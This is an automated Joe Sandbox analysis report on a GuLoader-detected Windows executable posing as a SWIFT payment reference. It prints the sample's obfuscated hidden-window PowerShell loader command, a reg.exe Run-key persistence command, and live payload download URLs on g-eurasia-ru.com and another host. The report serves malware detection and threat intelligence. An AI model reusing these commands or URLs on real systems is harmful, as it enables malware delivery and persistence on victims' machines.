Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe

Overview

General Information

Sample name:New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe
Analysis ID:1410987
MD5:724ac474c4fcaa1df6da3f9245ac9c85
SHA1:c68cc50c2bd9e44c87fbca76c4ebd0c7b9942b3d
SHA256:d223088dd0d29e76253a5cfcbf1cfaf05312285f2f2f60aeafc6e8a96efcbcde
Tags:exenjrat
Infos:

Detection

GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Machine Learning detection for dropped file
Machine Learning detection for sample
Obfuscated command line found
Powershell drops PE file
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Dosfuscation Activity
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe (PID: 6772 cmdline: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe MD5: 724AC474C4FCAA1DF6DA3F9245AC9C85)
    • powershell.exe (PID: 7108 cmdline: powershell.exe" -windowstyle hidden "$Nonfading=Get-Content 'C:\Users\user\AppData\Local\Temp\medlemskartotek\vejmaterialerne\Profilen127.Aff';$Bakkants=$Nonfading.SubString(17286,3);.$Bakkants($Nonfading) MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7176 cmdline: C:\Windows\system32\cmd.exe" /c "set /A 1^^0 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Vitis.exe (PID: 7512 cmdline: C:\Users\user\AppData\Local\Temp\Vitis.exe MD5: 724AC474C4FCAA1DF6DA3F9245AC9C85)
        • cmd.exe (PID: 7568 cmdline: C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Bortopereringer" /t REG_EXPAND_SZ /d "%Trimmere% -windowstyle minimized $storkenes=(Get-ItemProperty -Path 'HKCU:\Oxylabrax\').Discumber;%Trimmere% ($storkenes) MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • reg.exe (PID: 7628 cmdline: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Bortopereringer" /t REG_EXPAND_SZ /d "%Trimmere% -windowstyle minimized $storkenes=(Get-ItemProperty -Path 'HKCU:\Oxylabrax\').Discumber;%Trimmere% ($storkenes)" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
SourceRuleDescriptionAuthorStrings
00000007.00000002.2926040964.00000000018C7000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    00000001.00000002.2601234406.0000000008F67000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

      System Summary

      barindex
      Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell.exe" -windowstyle hidden "$Nonfading=Get-Content 'C:\Users\user\AppData\Local\Temp\medlemskartotek\vejmaterialerne\Profilen127.Aff';$Bakkants=$Nonfading.SubString(17286,3);.$Bakkants($Nonfading), CommandLine: powershell.exe" -windowstyle hidden "$Nonfading=Get-Content 'C:\Users\user\AppData\Local\Temp\medlemskartotek\vejmaterialerne\Profilen127.Aff';$Bakkants=$Nonfading.SubString(17286,3);.$Bakkants($Nonfading), CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe, ParentImage: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe, ParentProcessId: 6772, ParentProcessName: New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe, ProcessCommandLine: powershell.exe" -windowstyle hidden "$Nonfading=Get-Content 'C:\Users\user\AppData\Local\Temp\medlemskartotek\vejmaterialerne\Profilen127.Aff';$Bakkants=$Nonfading.SubString(17286,3);.$Bakkants($Nonfading), ProcessId: 7108, ProcessName: powershell.exe
      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: %Trimmere% -windowstyle minimized $storkenes=(Get-ItemProperty -Path 'HKCU:\Oxylabrax\').Discumber;%Trimmere% ($storkenes), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 7628, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Bortopereringer
      Source: Process startedAuthor: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Bortopereringer" /t REG_EXPAND_SZ /d "%Trimmere% -windowstyle minimized $storkenes=(Get-ItemProperty -Path 'HKCU:\Oxylabrax\').Discumber;%Trimmere% ($storkenes)", CommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Bortopereringer" /t REG_EXPAND_SZ /d "%Trimmere% -windowstyle minimized $storkenes=(Get-ItemProperty -Path 'HKCU:\Oxylabrax\').Discumber;%Trimmere% ($storkenes)", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Bortopereringer" /t REG_EXPAND_SZ /d "%Trimmere% -windowstyle minimized $storkenes=(Get-ItemProperty -Path 'HKCU:\Oxylabrax\').Discumber;%Trimmere% ($storkenes), ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7568, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Bortopereringer" /t REG_EXPAND_SZ /d "%Trimmere% -windowstyle minimized $storkenes=(Get-ItemProperty -Path 'HKCU:\Oxylabrax\').Discumber;%Trimmere% ($storkenes)", ProcessId: 7628, ProcessName: reg.exe
      Source: Process startedAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe" /c "set /A 1^^0, CommandLine: C:\Windows\system32\cmd.exe" /c "set /A 1^^0, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: powershell.exe" -windowstyle hidden "$Nonfading=Get-Content 'C:\Users\user\AppData\Local\Temp\medlemskartotek\vejmaterialerne\Profilen127.Aff';$Bakkants=$Nonfading.SubString(17286,3);.$Bakkants($Nonfading), ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7108, ParentProcessName: powershell.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe" /c "set /A 1^^0, ProcessId: 7176, ProcessName: cmd.exe
      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Bortopereringer" /t REG_EXPAND_SZ /d "%Trimmere% -windowstyle minimized $storkenes=(Get-ItemProperty -Path 'HKCU:\Oxylabrax\').Discumber;%Trimmere% ($storkenes), CommandLine: C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Bortopereringer" /t REG_EXPAND_SZ /d "%Trimmere% -windowstyle minimized $storkenes=(Get-ItemProperty -Path 'HKCU:\Oxylabrax\').Discumber;%Trimmere% ($storkenes), CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\Vitis.exe, ParentImage: C:\Users\user\AppData\Local\Temp\Vitis.exe, ParentProcessId: 7512, ParentProcessName: Vitis.exe, ProcessCommandLine: C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Bortopereringer" /t REG_EXPAND_SZ /d "%Trimmere% -windowstyle minimized $storkenes=(Get-ItemProperty -Path 'HKCU:\Oxylabrax\').Discumber;%Trimmere% ($storkenes), ProcessId: 7568, ProcessName: cmd.exe
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe" -windowstyle hidden "$Nonfading=Get-Content 'C:\Users\user\AppData\Local\Temp\medlemskartotek\vejmaterialerne\Profilen127.Aff';$Bakkants=$Nonfading.SubString(17286,3);.$Bakkants($Nonfading), CommandLine: powershell.exe" -windowstyle hidden "$Nonfading=Get-Content 'C:\Users\user\AppData\Local\Temp\medlemskartotek\vejmaterialerne\Profilen127.Aff';$Bakkants=$Nonfading.SubString(17286,3);.$Bakkants($Nonfading), CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe, ParentImage: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe, ParentProcessId: 6772, ParentProcessName: New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe, ProcessCommandLine: powershell.exe" -windowstyle hidden "$Nonfading=Get-Content 'C:\Users\user\AppData\Local\Temp\medlemskartotek\vejmaterialerne\Profilen127.Aff';$Bakkants=$Nonfading.SubString(17286,3);.$Bakkants($Nonfading), ProcessId: 7108, ProcessName: powershell.exe
      No Snort rule has matched

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
      Source: C:\Users\user\AppData\Local\Temp\Vitis.exeReversingLabs: Detection: 57%
      Source: New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exeReversingLabs: Detection: 57%
      Source: C:\Users\user\AppData\Local\Temp\Vitis.exeJoe Sandbox ML: detected
      Source: New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exeJoe Sandbox ML: detected
      Source: New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.2592272811.0000000000B3E000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.2599516690.0000000008435000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: indows\System.Core.pdb source: powershell.exe, 00000001.00000002.2596714001.000000000712F000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Core.pdb source: powershell.exe, 00000001.00000002.2592272811.0000000000B05000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: tem.Core.pdbN source: powershell.exe, 00000001.00000002.2596714001.000000000712F000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.2596714001.00000000070C0000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Core.pdbk source: powershell.exe, 00000001.00000002.2592272811.0000000000B05000.00000004.00000020.00020000.00000000.sdmp
      Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B
      Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exeCode function: 0_2_00405C13 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C13
      Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exeCode function: 0_2_0040683D FindFirstFileW,FindClose,0_2_0040683D
      Source: C:\Users\user\AppData\Local\Temp\Vitis.exeCode function: 7_2_0040290B FindFirstFileW,7_2_0040290B
      Source: C:\Users\user\AppData\Local\Temp\Vitis.exeCode function: 7_2_00405C13 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,7_2_00405C13
      Source: C:\Users\user\AppData\Local\Temp\Vitis.exeCode function: 7_2_0040683D FindFirstFileW,FindClose,7_2_0040683D
      Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exeFile opened: C:\Users\userJump to behavior
      Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCacheJump to behavior
      Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exeFile opened: C:\Users\user\AppDataJump to behavior
      Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
      Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exeFile opened: C:\Users\user\AppData\Local\Microsoft\WindowsJump to behavior
      Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exeFile opened: C:\Users\user\AppData\Local\MicrosoftJump to behavior
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownDNS traffic detected: queries for: g-eurasia-ru.com
      Source: Vitis.exe, 00000007.00000002.2938761024.000000001E350000.00000004.00001000.00020000.00000000.sdmp, Vitis.exe, 00000007.00000002.2926772694.0000000002473000.00000004.00000020.00020000.00000000.sdmp, Vitis.exe, 00000007.00000002.2926772694.0000000002477000.00000004.00000020.00020000.00000000.sdmp, Vitis.exe, 00000007.00000002.2926772694.000000000242D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://g-eurasia-ru.com/fan/ZfUdfOc32.bin
      Source: Vitis.exe, 00000007.00000002.2926772694.000000000242D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://g-eurasia-ru.com/fan/ZfUdfOc32.binA
      Source: Vitis.exe, 00000007.00000002.2926772694.0000000002473000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://g-eurasia-ru.com/fan/ZfUdfOc32.binD
      Source: Vitis.exe, 00000007.00000002.2938761024.000000001E350000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://g-eurasia-ru.com/fan/ZfUdfOc32.binDomiPhaclg-logistic.com.ua/toys/ZfUdfOc32.binSlanOelmig-pal
      Source: Vitis.exe, 00000007.00000002.2926772694.0000000002473000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://g-eurasia-ru.com/fan/ZfUdfOc32.binM
      Source: Vitis.exe, 00000007.00000002.2926772694.0000000002473000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://g-eurasia-ru.com/fan/ZfUdfOc32.binZ
      Source: Vitis.exe, 00000007.00000002.2926772694.0000000002473000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://g-eurasia-ru.com/fan/ZfUdfOc32.binh
      Source: Vitis.exe, 00000007.00000002.2926772694.0000000002473000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://g-eurasia-ru.com/fan/ZfUdfOc32.binu
      Source: Vitis.exe, 00000007.00000002.2926772694.000000000242D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://g-eurasia-ru.com/fan/ZfUdfOc32.binz
      Source: New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe, Vitis.exe.1.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: powershell.exe, 00000001.00000002.2595448132.0000000005A4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
      Source: powershell.exe, 00000001.00000002.2592920909.0000000004B36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: powershell.exe, 00000001.00000002.2592920909.00000000049E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: powershell.exe, 00000001.00000002.2592920909.0000000004B36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: powershell.exe, 00000001.00000002.2592920909.00000000049E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
      Source: powershell.exe, 00000001.00000002.2595448132.0000000005A4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
      Source: powershell.exe, 00000001.00000002.2595448132.0000000005A4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 00000001.00000002.2595448132.0000000005A4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
      Source: powershell.exe, 00000001.00000002.2592920909.0000000004B36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
      Source: powershell.exe, 00000001.00000002.2595448132.0000000005A4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
      Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exeCode function: 0_2_004056A8 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004056A8

      System Summary

      barindex
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\Vitis.exeJump to dropped file
      Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exeCode function: 0_2_004034F7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034F7
      Source: C:\Users\user\AppData\Local\Temp\Vitis.exeCode function: 7_2_004034F7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,7_2_004034F7
      Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exeFile created: C:\Windows\resources\0809Jump to behavior
      Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exeFile created: C:\Windows\resources\0809\gladiestJump to behavior
      Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exeFile created: C:\Windows\resources\sans.lnkJump to behavior
      Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exeCode function: 0_2_00406BFE0_2_00406BFE
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_069EF3F81_2_069EF3F8
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_069EF0B01_2_069EF0B0
      Source: C:\Users\user\AppData\Local\Temp\Vitis.exeCode function: 7_2_00406BFE7_2_00406BFE
      Source: New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe, 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamegstelistes hjuledes.exeDVarFileInfo$ vs New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe
      Source: New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exeBinary or memory string: OriginalFilenamegstelistes hjuledes.exeDVarFileInfo$ vs New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe
      Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exeSection loaded: dwmapi.dllJump to behavior
      Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exeSection loaded: oleacc.dllJump to behavior
      Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exeSection loaded: shfolder.dllJump to behavior
      Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exeSection loaded: riched20.dllJump to behavior
      Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exeSection loaded: usp10.dllJump to behavior
      Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exeSection loaded: msls31.dllJump to behavior
      Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
